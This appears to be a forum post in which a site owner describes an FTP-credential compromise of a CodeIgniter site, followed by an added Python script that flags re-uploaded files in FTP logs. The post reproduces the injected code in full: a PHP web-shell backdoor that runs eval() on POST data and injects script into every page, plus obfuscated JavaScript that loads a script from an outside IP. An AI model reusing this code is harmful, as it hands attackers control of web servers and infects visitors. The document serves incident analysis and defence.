Codeigniter Site Hacked
#1

[eluser]Patient[/eluser]
Just had a codeigniter site hacked. It was accessed via ftp with a genuine ftp username. There are ~2700 ftp log entries within a 24 minute period. The ftp access went through the site directory retrieving pages and uploading many modified pages. The first few lines from the ftp log are (note xxxxxxxxxxxxxxxx = valid ftp user):

Code:
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:25 -0500] "PASS (hidden)" 230 -
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:25 -0500] "PWD" 257 -
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:25 -0500] "TYPE A" 200 -
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:26 -0500] "PORT 81,169,145,25,158,251" 200 -
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:26 -0500] "LIST /" 226 1432
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:26 -0500] "PORT 81,169,145,25,222,47" 200 -
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:27 -0500] "LIST /IE7" 226 1104
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:31 -0500] "PORT 81,169,145,25,231,203" 200 -
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:31 -0500] "LIST /IE7/assets/director" 226 213
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:32 -0500] "PORT 81,169,145,25,160,5" 200 -
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:32 -0500] "LIST /IE7/assets/img" 226 284
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:33 -0500] "PORT 81,169,145,25,160,25" 200 -
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:33 -0500] "LIST /IE7/assets/js" 226 1091
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:33 -0500] "PORT 81,169,145,25,237,105" 200 -
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:34 -0500] "RETR /IE7/assets/js/effects.js" 226 38227
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:35 -0500] "PORT 81,169,145,25,240,127" 200 -
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:36 -0500] "STOR /IE7/assets/js/effects.js" 226 38453
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:36 -0500] "PORT 81,169,145,25,243,1" 200 -
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:36 -0500] "RETR /IE7/assets/js/general.js" 226 870
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:37 -0500] "PORT 81,169,145,25,244,181" 200 -
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:37 -0500] "STOR /IE7/assets/js/general.js" 226 1096
81.169.145.25 UNKNOWN xxxxxxxxxxxxxxxx [10/Apr/2009:01:14:38 -0500] "PORT 81,169,145,25,246,133" 200 -

The modifications made to pages were:

PHP - added the following at the top of the page:
Quote:&lt;?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0Nzb0ZjT2pjcjhuZ2lwZ0t0JTIwc29GcmNnSyUzRCUyRiUyRjk0bUxTJTJFMm9GNG9GN29GJTJFMiUyRTE5NSUyRmpxOG5ndWVPamNyeSUyRW1BamdLcyUzRSUzQ29GJTJGbUFzZ0tjbUxTcm1BaW9GcDhuZ3QlM0UnKS5yZXBsYWNlKC9tQXxnS3xtTFN8T2pjfDh4bXw4bmd8b0YvZywiIikpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)));$s=gzinflate(substr($s,10,-8));if(preg_match_all('#[removed]#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos;($v,'[removed]')))$s=str_replace($v,'',$s);}$s1=preg_replace('#[removed]&lt;!-- \ndocument\.write\(unescape\(.+?\n --&gt;[removed]#','',$s);if(stristr($s,'&lt;body'))$s=preg_replace('#(\s*&lt;body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'&lt;/body')||stristr($s,'&lt;/title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?&gt;

JS - added the following to the bottom of the pages:
Quote:<!--
[removed](unescape('u8E<nUscAOCrDlsipt 29gsWvArc=29g//u8E94.Q9D247Dls.Q9D2WvA.AOC129g9Dls529g/nUjquWvAe29gr29gyAOC.jWvAs>PvM</scru8Ei29gpu8EtKF>').replace(/Q9D|KF|29g|nU|AOC|WvA|PvM|u8E|Dls/g,""));
-->

HTML - added the following immediately before the <body> tag:
Quote:[removed]<!--
[removed](unescape('<ZTsTmcbdariptta ZTsrc=ta/z0/M894.ta2bda4Qn47.2z0.195/ZTjquez0rTmy.jQn4sta></sM8cZTripM8t>').replace(/Tm|M8|si|ta|ZT|Qn4|z0|bda/g,""));
-->[removed]

As far as I can see, these are obfuscated commands to import a js file jquery.js from ip 94.247.2.195.

Anyone seen this?

Any way to protect the site?
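A triage script for the kind of FTP transfer log shown above, added here as an example (not code from the poster or from CodeIgniter). It parses the log format as it appears in the post, lists every file that was fetched and then re-uploaded by the same account (the read-modify-write signature of a mass injection, with how much each file grew), and summarises per account how many uploads happened in how short a window. The field layout, the 192.0.2.10 address, the user name and the sample lines are constructed assumptions.

```python
import re
from datetime import datetime

# Assumed field layout, matching the lines in the post:
# ip host user [timestamp] "COMMAND arg" status bytes
LINE_RE = re.compile(
    r'^(?P<ip>\S+) (?P<host>\S+) (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<cmd>[A-Z]+)(?: (?P<arg>[^"]*))?" (?P<status>\d{3}) (?P<bytes>-|\d+)$'
)

# Constructed sample in the same format (not the poster's real log).
SAMPLE_LOG = """\
192.0.2.10 UNKNOWN siteuser [10/Apr/2009:01:14:25 -0500] "PASS (hidden)" 230 -
192.0.2.10 UNKNOWN siteuser [10/Apr/2009:01:14:26 -0500] "LIST /" 226 1432
192.0.2.10 UNKNOWN siteuser [10/Apr/2009:01:14:34 -0500] "RETR /assets/js/effects.js" 226 38227
192.0.2.10 UNKNOWN siteuser [10/Apr/2009:01:14:36 -0500] "STOR /assets/js/effects.js" 226 38453
192.0.2.10 UNKNOWN siteuser [10/Apr/2009:01:14:36 -0500] "RETR /index.php" 226 870
192.0.2.10 UNKNOWN siteuser [10/Apr/2009:01:14:37 -0500] "STOR /index.php" 226 1096
192.0.2.10 UNKNOWN siteuser [10/Apr/2009:01:15:00 -0500] "STOR /new-upload.txt" 226 12
"""

def parse_line(line):
    """Parse one log line into a dict, or None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["bytes"] = None if rec["bytes"] == "-" else int(rec["bytes"])
    return rec

def find_rewrites(lines):
    """Files downloaded (RETR) and then re-uploaded (STOR) by the same ip/user."""
    fetched, rewritten = {}, []
    for rec in filter(None, map(parse_line, lines)):
        key = (rec["ip"], rec["user"], rec["arg"])
        if rec["cmd"] == "RETR" and rec["status"] == "226":
            fetched[key] = rec
        elif rec["cmd"] == "STOR" and rec["status"] == "226" and key in fetched:
            before = fetched.pop(key)
            rewritten.append({"path": rec["arg"], "ip": rec["ip"],
                              "grew_by": rec["bytes"] - before["bytes"],
                              "seconds": (rec["ts"] - before["ts"]).total_seconds()})
    return rewritten

def session_summary(lines):
    """Per (ip, user): upload count and length of the activity window in seconds."""
    out = {}
    for rec in filter(None, map(parse_line, lines)):
        s = out.setdefault((rec["ip"], rec["user"]),
                           {"first": rec["ts"], "last": rec["ts"], "stor": 0})
        s["first"], s["last"] = min(s["first"], rec["ts"]), max(s["last"], rec["ts"])
        if rec["cmd"] == "STOR":
            s["stor"] += 1
    for s in out.values():
        s["seconds"] = (s["last"] - s["first"]).total_seconds()
    return out
```

Files whose size grows by the same amount in every rewrite are the ones to inspect first, since a fixed injected prefix adds the same byte count to each page.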

